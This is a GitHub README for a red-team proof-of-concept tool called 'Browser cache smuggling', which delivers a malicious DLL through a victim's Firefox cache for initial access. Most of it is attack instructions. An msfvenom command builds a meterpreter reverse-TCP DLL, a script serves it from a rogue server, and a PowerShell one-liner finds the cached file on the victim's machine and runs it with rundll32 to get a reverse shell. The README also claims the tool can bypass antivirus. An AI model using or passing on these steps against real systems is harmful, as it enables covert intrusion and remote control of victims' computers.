
This repository is all about the POC and Tools that can be leveraged down for initial access in red teaming engagements.

Primary LanguagePython

Browser cache smuggling Attack

  • This repository is all about the POC that can be leveraged down for initial access in red teaming engagements.
  • This has the capabilities to bypass AV , depends on from where DLL is generated !!
  • This Repo is in development , we will be adding more module for Brave & Chrome Browser soon....

Theory Behind it :

How to Execute it ?

Step 1 :

Git Clone the URL & install the dependency : pip3 install -r requirements.txt also make sure Nginx is installed on the machine

Step 2:

create your malicious DLL file , from your favorite C2 server . example : msfvenom -p /windows/x64/meterpreter/reverse_tcp LHOST=<localip> LPORT=<local_port> -f dll -o malicious.dll and configure your listener accordingly .

Step 3:

Host you rouge Server that coerce browser to Cache The response.

python3 browsercachesmuggling.py --dll /root/smugglers.dll <malicious_dll>

Step 4:

Once Our data is begin cache , we can now run the following command on victim PC like so:

foreach ($files in @("$env:LOCALAPPDATA\Mozilla\Firefox\Profiles\*.default-release\cache2\entries\")) {Get-ChildItem $files -Recurse | ForEach-Object {if (Select-String -Pattern "ENTRYPOINT" -Path $_.FullName) {$dllPath = $_.FullName + '.'; rundll32.exe $dllPath,MainDll}}}

NOTE: From the above command , make sure when u are running the dll file from rundll32 , you provide proper entry point eg (MainDLL) , which may be different for havoc C2. and we will get our reverse shell !!